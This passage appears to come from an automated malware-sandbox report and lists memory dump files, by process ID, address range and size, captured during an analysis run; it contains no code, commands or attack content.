• memory/5148-328-0x0000000006750000-0x0000000006794000-memory.dmp  Filesize: 272KB
• memory/5148-356-0x0000000007750000-0x0000000007782000-memory.dmp  Filesize: 200KB
• memory/5148-362-0x000000007F8C0000-0x000000007F8D0000-memory.dmp  Filesize: 64KB
• memory/5148-360-0x000000006D530000-0x000000006D884000-memory.dmp  Filesize: 3.3MB
• memory/5148-358-0x000000006D020000-0x000000006D06C000-memory.dmp  Filesize: 304KB
• memory/5148-372-0x0000000007730000-0x000000000774E000-memory.dmp  Filesize: 120KB
• memory/5148-373-0x0000000007790000-0x0000000007833000-memory.dmp  Filesize: 652KB
• memory/5148-374-0x0000000007890000-0x000000000789A000-memory.dmp  Filesize: 40KB
• memory/5148-375-0x00000000079A0000-0x0000000007A36000-memory.dmp  Filesize: 600KB
• memory/5148-376-0x00000000078A0000-0x00000000078B1000-memory.dmp  Filesize: 68KB
• memory/5148-180-0x0000000004DD0000-0x0000000004DE0000-memory.dmp  Filesize: 64KB
• memory/5148-390-0x00000000078E0000-0x00000000078EE000-memory.dmp  Filesize:

                                                                                                                                                                                                          56KB

                                                                                                                                                                                                        • memory/5148-397-0x0000000007900000-0x0000000007914000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          80KB

                                                                                                                                                                                                        • memory/5148-400-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/5148-182-0x0000000002860000-0x0000000002896000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          216KB

                                                                                                                                                                                                        • memory/5148-314-0x0000000006250000-0x000000000629C000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          304KB

                                                                                                                                                                                                        • memory/5148-410-0x0000000007950000-0x000000000796A000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          104KB

                                                                                                                                                                                                        • memory/5148-414-0x0000000007940000-0x0000000007948000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          32KB

                                                                                                                                                                                                        • memory/5148-418-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/5148-310-0x0000000005B40000-0x0000000005B5E000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          120KB

                                                                                                                                                                                                        • memory/5148-340-0x0000000007250000-0x00000000072C6000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          472KB

                                                                                                                                                                                                        • memory/5148-214-0x0000000005410000-0x0000000005A38000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                        • memory/5148-250-0x0000000005BB0000-0x0000000005C16000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          408KB

                                                                                                                                                                                                        • memory/5148-246-0x0000000005290000-0x00000000052F6000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          408KB

                                                                                                                                                                                                        • memory/5168-161-0x00000000005C0000-0x00000000006C0000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                        • memory/5168-158-0x0000000000480000-0x000000000048B000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          44KB

                                                                                                                                                                                                        • memory/5168-202-0x0000000000400000-0x0000000000437000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          220KB

                                                                                                                                                                                                        • memory/5168-159-0x0000000000400000-0x0000000000437000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          220KB

                                                                                                                                                                                                        • memory/5344-320-0x0000000000B20000-0x0000000001058000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                        • memory/5344-216-0x0000000000B20000-0x0000000001058000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                        • memory/5388-335-0x0000000000400000-0x000000000063B000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                        • memory/5388-164-0x0000000000680000-0x00000000006A7000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          156KB

                                                                                                                                                                                                        • memory/5388-163-0x00000000006D0000-0x00000000007D0000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                        • memory/5388-171-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          972KB

                                                                                                                                                                                                        • memory/5388-322-0x00000000006D0000-0x00000000007D0000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                        • memory/5388-280-0x0000000000400000-0x000000000063B000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                        • memory/5388-165-0x0000000000400000-0x000000000063B000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                        • memory/5480-129-0x0000000000400000-0x00000000005DB000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                        • memory/5480-126-0x0000000000400000-0x00000000005DB000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                        • memory/5480-127-0x0000000000400000-0x00000000005DB000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                        • memory/5724-139-0x0000000074AB0000-0x0000000075260000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                        • memory/5724-155-0x0000000005250000-0x0000000005260000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/5724-16-0x0000000005250000-0x0000000005260000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          64KB

                                                                                                                                                                                                        • memory/5724-15-0x0000000074AB0000-0x0000000075260000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                        • memory/5724-14-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          32KB

                                                                                                                                                                                                        • memory/6140-152-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          80KB

                                                                                                                                                                                                        • memory/6140-70-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          80KB